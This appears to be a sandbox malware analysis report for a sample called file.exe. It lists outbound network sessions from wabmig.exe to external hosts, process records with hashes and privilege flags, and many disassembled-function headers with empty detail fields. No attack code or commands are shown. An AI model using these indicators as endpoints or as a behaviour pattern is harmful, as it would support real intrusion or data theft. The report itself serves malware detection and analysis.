Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.8 | 49728 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:39.236999989 CEST | 151 | OUT | |
Sep 25, 2024 16:01:39.903758049 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.8 | 49713 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:29 UTC | 84 | OUT | |
2024-09-25 14:01:30 UTC | 684 | IN | |
2024-09-25 14:01:30 UTC | 340 | IN | |
2024-09-25 14:01:30 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:30 UTC | 60 | OUT | |
2024-09-25 14:01:30 UTC | 686 | IN | |
2024-09-25 14:01:30 UTC | 340 | IN | |
2024-09-25 14:01:30 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:32 UTC | 84 | OUT | |
2024-09-25 14:01:32 UTC | 710 | IN | |
2024-09-25 14:01:32 UTC | 340 | IN | |
2024-09-25 14:01:32 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.8 | 49719 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:33 UTC | 84 | OUT | |
2024-09-25 14:01:33 UTC | 674 | IN | |
2024-09-25 14:01:33 UTC | 340 | IN | |
2024-09-25 14:01:33 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.8 | 49721 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:34 UTC | 60 | OUT | |
2024-09-25 14:01:34 UTC | 684 | IN | |
2024-09-25 14:01:34 UTC | 340 | IN | |
2024-09-25 14:01:34 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.8 | 49723 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:36 UTC | 84 | OUT | |
2024-09-25 14:01:36 UTC | 674 | IN | |
2024-09-25 14:01:36 UTC | 340 | IN | |
2024-09-25 14:01:36 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.8 | 49725 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:37 UTC | 84 | OUT | |
2024-09-25 14:01:37 UTC | 690 | IN | |
2024-09-25 14:01:37 UTC | 340 | IN | |
2024-09-25 14:01:37 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:38 UTC | 60 | OUT | |
2024-09-25 14:01:39 UTC | 682 | IN | |
2024-09-25 14:01:39 UTC | 340 | IN | |
2024-09-25 14:01:39 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.8 | 49729 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:40 UTC | 84 | OUT | |
2024-09-25 14:01:40 UTC | 674 | IN | |
2024-09-25 14:01:40 UTC | 340 | IN | |
2024-09-25 14:01:40 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.8 | 49730 | 149.154.167.220 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 14:01:41 UTC | 349 | OUT | |
2024-09-25 14:01:41 UTC | 344 | IN | |
2024-09-25 14:01:41 UTC | 55 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 10:00:07 |
Start date: | 25/09/2024 |
Path: | C:\Users\user\Desktop\file.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 750'104 bytes |
MD5 hash: | 7FBB332B55F872E61C8307E0B5242287 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:00:08 |
Start date: | 25/09/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 10:00:08 |
Start date: | 25/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ee680000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 10:01:10 |
Start date: | 25/09/2024 |
Path: | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd50000 |
File size: | 66'048 bytes |
MD5 hash: | BBC90B164F1D84DEDC1DC30F290EC5F6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Has exited: | false |
Execution Graph
Execution Coverage: | 25.3% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.3% |
Total number of Nodes: | 1460 |
Total number of Limit Nodes: | 48 |
Graph
Function 6FF61096 Relevance: 116.1, APIs: 56, Strings: 10, Instructions: 627filestringmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403532 Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 464stringfilecomCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403C29 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215stringregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040202F Relevance: 3.1, APIs: 2, Instructions: 65memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004049C7 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406DC6 Relevance: .3, Instructions: 334COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040759D Relevance: .3, Instructions: 300COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 6FF61B67 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 83processstringsynchronizationCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 6FF61987 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 6FF61A61 Relevance: 5.0, APIs: 4, Instructions: 45stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0775C80E Relevance: 1.9, Instructions: 1853COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0EBD8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0F4A8 Relevance: .3, Instructions: 266COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0B0E8 Relevance: 6.8, Strings: 5, Instructions: 520COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0F220 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0F21C Relevance: 2.7, Strings: 2, Instructions: 178COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0BDA0 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0EBCC Relevance: 1.5, Strings: 1, Instructions: 290COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07753130 Relevance: 1.4, Instructions: 1370COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0775D5EE Relevance: 1.2, Instructions: 1234COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077548E8 Relevance: .9, Instructions: 904COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0775570A Relevance: .9, Instructions: 888COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077534B4 Relevance: .9, Instructions: 886COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077548E3 Relevance: .8, Instructions: 814COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077558DF Relevance: .6, Instructions: 647COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751278 Relevance: .6, Instructions: 626COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0775D7B2 Relevance: .6, Instructions: 624COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077586B8 Relevance: .6, Instructions: 598COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C09B50 Relevance: .6, Instructions: 581COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0775DA44 Relevance: .4, Instructions: 441COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0775D839 Relevance: .4, Instructions: 437COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C07424 Relevance: .3, Instructions: 263COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0F49C Relevance: .3, Instructions: 261COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C02AA0 Relevance: .2, Instructions: 208COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751E80 Relevance: .2, Instructions: 192COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C07CDE Relevance: .2, Instructions: 188COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07750548 Relevance: .2, Instructions: 180COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07750C78 Relevance: .2, Instructions: 175COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C07B5B Relevance: .2, Instructions: 163COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0775869C Relevance: .1, Instructions: 138COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C07901 Relevance: .1, Instructions: 121COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07750B00 Relevance: .1, Instructions: 120COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C07918 Relevance: .1, Instructions: 110COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C02BB0 Relevance: .1, Instructions: 109COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 077560E8 Relevance: .1, Instructions: 108COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C096A8 Relevance: .1, Instructions: 97COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751150 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751020 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751000 Relevance: .1, Instructions: 87COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751134 Relevance: .1, Instructions: 81COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751E64 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C09697 Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04C0EEC3 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04A7D01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04A7D007 Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07751BAF Relevance: .0, Instructions: 6COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04A7D6E4 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 20.1% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 141 |
Total number of Limit Nodes: | 1 |
Graph
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 25D40B30 Relevance: 2.0, Strings: 1, Instructions: 709COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009469A0 Relevance: .5, Instructions: 515COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00946FC8 Relevance: .4, Instructions: 450COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00943E13 Relevance: .4, Instructions: 430COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 25D42968 Relevance: .3, Instructions: 268COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094C147 Relevance: .2, Instructions: 230COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 25D42DC8 Relevance: .2, Instructions: 220COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 25D42DBE Relevance: .2, Instructions: 220COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 25D4310E Relevance: .2, Instructions: 202COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094D278 Relevance: .2, Instructions: 188COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094CA08 Relevance: .2, Instructions: 187COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094CCD8 Relevance: .2, Instructions: 186COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094C738 Relevance: .2, Instructions: 185COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094CFA9 Relevance: .2, Instructions: 185COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00945370 Relevance: .2, Instructions: 153COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094E988 Relevance: .1, Instructions: 147COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094E97B Relevance: .1, Instructions: 146COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 25D4992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009462F0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0094F31B Relevance: 1.3, Strings: 1, Instructions: 70COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
